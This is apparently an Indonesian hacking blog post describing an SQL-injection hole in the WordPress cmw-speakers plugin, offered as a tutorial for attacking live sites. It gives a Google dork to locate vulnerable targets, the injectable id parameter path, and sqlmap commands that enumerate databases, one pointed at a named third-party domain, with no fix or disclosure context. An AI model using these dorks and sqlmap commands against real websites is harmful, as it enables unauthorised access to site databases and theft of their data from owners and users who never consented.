Wordpress cmw-speakers Plugin SQL-injection Vulnerability in Parrot os linux


Assalamualaikum Wr.Wb.
atas di beri nya nikmat dan kesehatan maupun rizki dari Allah SWT, Saya Mr.GagalTotal666 kali ini akan share cara metode celah pada Wordpress yaitu :
Plugins/cmw-Speakers_details.php?id=
cara ini masih fresh dan segar ^_^ , tetapi hanya sebagian pihak website yang menggunakan wordpress sudah ada mengetahui celah ini , jadi hanya beberapa websites yang ada kemungkinan Vlunerability.

#################################
| Dork : inurl:/speaker_details.php?id=
| version : ALL
| Tested on: [Parrot os]
| Date: 18/01/2017
#################################

Exploit :                                                                
|http://127.0.0.1/wp-content/plugins/cmw-speakers/speaker_details.php?id=


Sqlmap Poc :
sqlmap -u "http://target.com/wp-content/plugins/cmw-speakers/speaker_details.php?id=558" -p id --dbs
sqlmap -u "http://cmw.net/radio/wp-content/plugins/cmw-speakers/speaker_details.php?id=558" --dbs

berikut contoh hasil database :


simak video dibawah ini :


mohon maaf jika video ada kesalahan dan kekurangan nya ^_^ saya juga masih belajar
sekian tutorial nya semoga bermanfaat ^_^
Previous
Next Post »